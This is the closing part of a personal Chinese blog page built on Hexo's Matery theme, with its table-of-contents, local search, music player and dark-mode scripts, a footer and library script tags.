        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h1, h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/aplayer/APlayer.min.js"></script>
<script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/aplayer/Meting.min.js"></script>

    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2023</span>
            
            <a href="/about" target="_blank">Ethe</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
                &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                        class="white-color">259.9k</span>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/Ethe448" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:1078240421@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=1078240421" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 1078240421" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>

    <!-- 白天和黑夜主题 -->
<div class="sum-moon-box">
  <a class="btn-floating btn-large waves-effect waves-light" onclick="switchNightMode()" title="切换主题" >
    <i id="sum-moon-icon" class="fas fa-sun" style="width:48px; height:48px; font-size: 28px;"></i>
  </a>
</div>

<script>
  function switchNightMode() {
    $('<div class="Cuteen_DarkSky"><div class="Cuteen_DarkPlanet"></div></div>').appendTo($('body')),
      setTimeout(function () {
        $('body').hasClass('DarkMode') 
        ? ($('body').removeClass('DarkMode'), localStorage.setItem('isDark', '1'), $('#sum-moon-icon').removeClass("fa-sun").addClass('fa-moon')) 
        : ($('body').addClass('DarkMode'), localStorage.setItem('isDark', '0'), $('#sum-moon-icon').addClass("fa-sun").removeClass('fa-moon')),
          
        setTimeout(function () {
          $('.Cuteen_DarkSky').fadeOut(1e3, function () {
            $(this).remove()
          })
        }, 2e3)
      })
  }
</script>

    <script>
    //模式判断 
    if (localStorage.getItem('isDark') === '0') {
        document.body.classList.add('DarkMode');
        $('#sum-moon-icon').addClass("fa-sun").removeClass('fa-moon')
    } else {
        document.body.classList.remove('DarkMode');
        $('#sum-moon-icon').removeleClass("fa-sun").addClass('fa-moon')
    }
    </script>

    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/materialize/materialize.min.js"></script>
    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/aos/aos.js"></script>
    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/js/matery.js"></script>

    

    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
    

     
        <script src="https://ssl.captcha.qq.com/TCaptcha.js"></script>
        <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/others/TencentCaptcha.js"></script>
        <button id="TencentCaptcha" data-appid="xxxxxxxxxx" data-cbfn="callback" type="button" hidden></button>
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

    
    
    <script async src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
